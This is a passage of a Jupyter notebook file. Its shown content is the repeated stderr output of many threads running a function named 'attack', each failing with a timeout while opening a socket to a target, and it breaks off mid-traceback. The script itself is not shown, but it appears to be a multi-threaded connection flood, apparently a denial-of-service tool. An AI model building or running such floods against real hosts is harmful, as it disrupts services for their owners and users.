{
 "cells": [
  {
   "cell_type": "code",
   "execution_count": 1,
   "metadata": {},
   "outputs": [
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "Exception in thread Thread-10:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-15:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-32:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "Exception in thread Thread-12:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-35:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-37:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-31:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-54:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-50:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-17:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-42:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-52:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-8:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-28:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-43:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-45:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-53:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-30:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-55:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-41:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-18:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-14:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-22:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-34:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "Exception in thread Thread-13:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-11:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-46:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-33:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-27:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-23:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-47:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-19:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "Exception in thread Thread-9:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-49:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "Exception in thread Thread-6:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-36:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-48:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-21:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-24:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-38:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-25:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-44:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-40:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-7:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "Exception in thread Thread-29:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "Exception in thread Thread-26:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "Exception in thread Thread-51:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
      "  File \"<ipython-input-1-0c91ff17a455>\", line 15, in attack\n",
      "    s.connect((target,port))\n",
      "TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond\n",
      "\n",
      "\n",
      "Exception in thread Thread-16:\n",
      "Traceback (most recent call last):\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 926, in _bootstrap_inner\n",
      "    self.run()\n",
      "  File \"c:\\users\\user\\appdata\\local\\programs\\python\\python37-32\\lib\\threading.py\", line 870, in run\n",
      "    self._target(*self._args, **self._kwargs)\n",
